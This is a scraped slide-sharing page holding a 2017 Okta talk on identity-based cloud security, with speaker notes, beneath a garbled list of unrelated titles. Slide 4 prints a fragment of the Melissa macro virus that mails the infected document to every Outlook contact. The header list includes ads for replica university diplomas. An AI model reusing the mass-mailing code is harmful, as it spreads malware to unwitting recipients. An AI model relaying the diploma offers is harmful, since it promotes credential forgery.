2024: The FAR - Federal Acquisition Regulations, Part 402024: The FAR - Federal Acquisition Regulations, Part 40
2024: The FAR - Federal Acquisition Regulations, Part 40
 
2024: The FAR - Federal Acquisition Regulations, Part 42
2024: The FAR - Federal Acquisition Regulations, Part 422024: The FAR - Federal Acquisition Regulations, Part 42
2024: The FAR - Federal Acquisition Regulations, Part 42
 
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
 
Abiy Berehe - Texas Commission on Environmental Quality Updates
Abiy Berehe - Texas Commission on Environmental Quality UpdatesAbiy Berehe - Texas Commission on Environmental Quality Updates
Abiy Berehe - Texas Commission on Environmental Quality Updates
 
Item #s 8&9 -- Demolition Code Amendment
Item #s 8&9 -- Demolition Code AmendmentItem #s 8&9 -- Demolition Code Amendment
Item #s 8&9 -- Demolition Code Amendment
 
Texas Water Development Board Updates June 2024
Texas Water Development Board Updates June 2024Texas Water Development Board Updates June 2024
Texas Water Development Board Updates June 2024
 
karnataka housing board schemes . all schemes
karnataka housing board schemes . all schemeskarnataka housing board schemes . all schemes
karnataka housing board schemes . all schemes
 
China Politics social economic political
China Politics social economic politicalChina Politics social economic political
China Politics social economic political
 
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
 
Milton Keynes Hospital Charity - A guide to leaving a gift in your Will
Milton Keynes Hospital Charity - A guide to leaving a gift in your WillMilton Keynes Hospital Charity - A guide to leaving a gift in your Will
Milton Keynes Hospital Charity - A guide to leaving a gift in your Will
 
Bharat Mata - History of Indian culture.pdf
Bharat Mata - History of Indian culture.pdfBharat Mata - History of Indian culture.pdf
Bharat Mata - History of Indian culture.pdf
 
IEA World Energy Investment June 2024- Statistics
IEA World Energy Investment June 2024- StatisticsIEA World Energy Investment June 2024- Statistics
IEA World Energy Investment June 2024- Statistics
 
Researching the client.pptxsxssssssssssssssssssssss
Researching the client.pptxsxssssssssssssssssssssssResearching the client.pptxsxssssssssssssssssssssss
Researching the client.pptxsxssssssssssssssssssssss
 
Contributi dei parlamentari del PD - Contributi L. 3/2019
Contributi dei parlamentari del PD - Contributi L. 3/2019Contributi dei parlamentari del PD - Contributi L. 3/2019
Contributi dei parlamentari del PD - Contributi L. 3/2019
 
World Food Safety Day 2024- Communication-toolkit.
World Food Safety Day 2024- Communication-toolkit.World Food Safety Day 2024- Communication-toolkit.
World Food Safety Day 2024- Communication-toolkit.
 
2024: The FAR - Federal Acquisition Regulations, Part 39
2024: The FAR - Federal Acquisition Regulations, Part 392024: The FAR - Federal Acquisition Regulations, Part 39
2024: The FAR - Federal Acquisition Regulations, Part 39
 
Item # 10 -- Historical Presv. Districts
Item # 10 -- Historical Presv. DistrictsItem # 10 -- Historical Presv. Districts
Item # 10 -- Historical Presv. Districts
 
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
 
PPT Item # 7 - 231 Encino Avenue (sign. review)
PPT Item # 7 - 231 Encino Avenue (sign. review)PPT Item # 7 - 231 Encino Avenue (sign. review)
PPT Item # 7 - 231 Encino Avenue (sign. review)
 

Identity as the Perimeter

  • 1. Chris Niggel | Okta Director Security & Compliance Identity as the Perimeter October 2017
  • 2. © Okta and/or its affiliates. All rights reserved. Okta Confidential Or: How I Learned To Stop Worrying And Love The Cloud
  • 3. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 4. © Okta and/or its affiliates. All rights reserved. Okta Confidential 4 Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) Mail.Subject = "Important Message From " & Application.UserName Mail.Body = "Here is that document you asked for” Mail.Attachments.Add ActiveDocument.FullName Mail.Send
  • 5. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 6. © Okta and/or its affiliates. All rights reserved. Okta Confidential Photo Credit: https://upload.wikimedia.org/wikipedia/commons/2/22/Bodiam_Castle_south.jpg
  • 7. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 8. © Okta and/or its affiliates. All rights reserved. Okta Confidential Image: http://thedailywtf.com/images/remy/robotguys.png
  • 9. © Okta and/or its affiliates. All rights reserved. Okta Confidential Source: Okta Businesses @ Work Report, Jan 2017
  • 10. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 11. © Okta and/or its affiliates. All rights reserved. Okta Confidential I can’t control what applications employees use, but I can make the approved applications more attractive than the alternatives
  • 12. © Okta and/or its affiliates. All rights reserved. Okta Confidential IDENTITY Partners Employees Contractors Customers Cloud Platforms On-Premises Systems Applications Devices
  • 13. © Okta and/or its affiliates. All rights reserved. Okta Confidential Context Adaptive Access Allow Step-up Restrict Deny
  • 15. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 16. © Okta and/or its affiliates. All rights reserved. Okta Confidential
  • 17. 1

Hinweis der Redaktion

  1. There is a fundamental problem in the way we promote and treat system security. For 15 years I was a “network administrator” for businesses across the country.   My primary metric was uptime. Was the system up. How quickly could the system be up. Why is the system down?
  2. This used to be relatively easy. My biggest concern was my users causing problems, for example when the office manager at my first job decided to re-organize all of the files on her computer by file type. At least I was able to recover her files from backup.
  3. Then came along internet viruses and worms, with now infamous names: Code Red, Nimda, and Melissa This is Melissa, one of the first internet-scale viruses. It took mere hours for this to circle the globe, infecting tens of thousands of computers. A mere 6 lines of code.
  4. As we relied on more and more systems connected to the internet, the attacks also got larger. One day, I had an attacker guess a user’s password and use my mail server to send tens of thousands of email messages. I had phone servers taken over and used against Taiwan, the attacks got more brazen, and more damaging
  5. Our solution to the problem was to build walls and secrets. We viewed information security like building a castle. Moat to cross in the form of a firewall, with a VPN forming our drawbridge. Secret passwords to open the gate through our 3-foot-thick stone walls, and we moved all of our corporate data inside of this fortress Soon, we were trapped within our network. Sure, things were secure, but all this security was painful for employees. Mobile devices became a force of change against us
  6. So, as we forced users to have complex passwords, with multiple letters, numbers, symbols, our users put them on post-it notes, and re-used the same password across personal and corporate sites. So when Google lost 5 million passwords, and linkedin lost 110 million in 2012, we had to reset corporate accounts, too
  7. When we found passwords were not strong enough, we deployed multifactor tokens, that had to be carried around everywhere we went. Of course, if you left your token on your desk, and the boss wanted that critical report done by the morning, you were stuck. So users put their multifactor token in front of a webcam!
  8. As technology progressed, and cloud services took off,I struggled to keep our data within the castle walls, implementing filtering at the firewall. But it was a losing battle - employees just used different services.
  9. Employees not graded on security, they have other tasks to do. Therefore, they are always going to follow the path of least resistance. A recent report by SkyHigh finds that Federal agencies currently use over 900 unique cloud applications. You are here because cloud is here. We must embrace how it can enable your business. We need a fundamental shift in IT.
  10. I realized that the days of placing walls around our networks are over. Software-as-a-Service means that the traditional financial and network controls we could use were no longer effective. As a system administrator, the ease of procuring new applications meant that I had to get out of managing tools the business wanted, and into enabling employees to use the tools they needed. I realized that I could no longer control what applications employees used, I had to shift and make the applications the business offered faster and easier than the alternatives
  11. The first step was to deploy single sign-on to move identity to the center of the experience. You don’t want to remember 100 different passwords, or have 100 bookmarks for applications all over the internet. By tying applications to their corporate identity, I created a single sign-on experience that put key tools at employee fingertips. Single Sign-On is just the start, however. Business customers don’t want to manage their own cloud applications, having to create accounts, move accounts, manage permissions, and deprovision when employees leave. By tying corporate applications to a single sign-in platform, I automated all of the account creation and deletion, so when employees started, they already had access to everything they need
  12. The second challenge is secure MFA. Remember finding out tokens broadcast on a webcam? With traditional approaches, Those RSA tokens were placed at the perimeter, requiring tokens all the time and encouraging abuse. Risk-based MFA eliminates all-or-nothing approaches and encourages the use of strong authentication but putting it where it is needed, and removing friction where it’s not
  13. Once departments started seeing the value, they began to approach me for solutions. The application library grew quickly. By supporting the applications people wanted to use, IT was no longer the “no” team, we were a business partner We knew what cloud applications were being used, and by whom, reducing license costs and saving money But I was still unable to keep up with the speed of business, and the shadow IT problem persisted.
  14. The only solution was to hand over the keys to our business customers. IT is not prepared to own all account provisioning, we don’t have the staff or the knowledge. When we move the perimeter to the identity, we are now able to split responsibilities. Sales understands how they use their tools, so they should be responsible for the accounts. Implementing application assignment workflows keeps ownership with other departments, while giving IT and security the visibility and control they need. It’s the best of both worlds, and enabled me to turn Shadow IT into Distributed IT.
  15. Before embracing the cloud This used to be my job – keeping the castle walls tall and strong meant endless patching and progress bars I was tied to my desk adding uptime instead of adding value
  16. With cloud services controlled by a risk-based identity management system, I’m able to work wherever and whenever I’m most productive. By making identity the perimeter, I’m no longer watching progress bars, I’m making progress.
  17. Thank you!